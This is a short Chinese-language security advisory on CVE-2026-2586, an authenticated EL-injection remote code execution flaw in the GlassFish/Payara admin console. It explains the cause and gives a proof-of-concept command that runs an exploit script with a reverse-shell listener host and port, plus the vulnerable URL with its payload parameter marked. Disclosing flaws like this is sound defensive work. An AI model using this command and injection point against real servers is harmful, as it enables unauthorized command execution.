经过身份验证的GlassFish EL注入RCE(CVE-2026-2586)
GlassFish管理控制台中存在一个表达式语言注入漏洞,允许经过身份验证的用户将恶意的EL表达式注入到管理Web界面处理的参数中。成功利用该漏洞可能导致在受影响服务器上远程执行命令。
该漏洞在服务器虚拟配置编辑流程中被发现,在此流程中,用户可控的参数被应用程序不安全地解释。
原因如下:
- 管理界面在处理EL表达式时使用了用户可控的参数。
- 输入在后端解释之前未经过适当的验证或清理。
- 管理控制台中经过身份验证的用户可以滥用此漏洞行为来调用Java类和方法。
- 在成功利用的场景下,拥有有效凭据的攻击者可以在底层操作系统上执行命令。
受影响组件
- 产品:GlassFish / Payara管理控制台
- CVE:CVE-2026-2586
- 类型:表达式语言注入
- 影响:经过身份验证的远程代码执行
- 攻击向量:管理Web界面
概念验证
该测试在本地受控环境中进行。
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure
存在漏洞的URL:
https://glassfish:4848/web/configuration/virtualServerEdit.jsf?name=server&configName=server-config&alertType=success&alertSummary=PAYLOAD&alertDetail=&bare=true
法律声明
仅限授权使用。DeepSecurity Perú 不认可未经授权的访问,并且对所提供的任何信息的滥用不承担任何责任。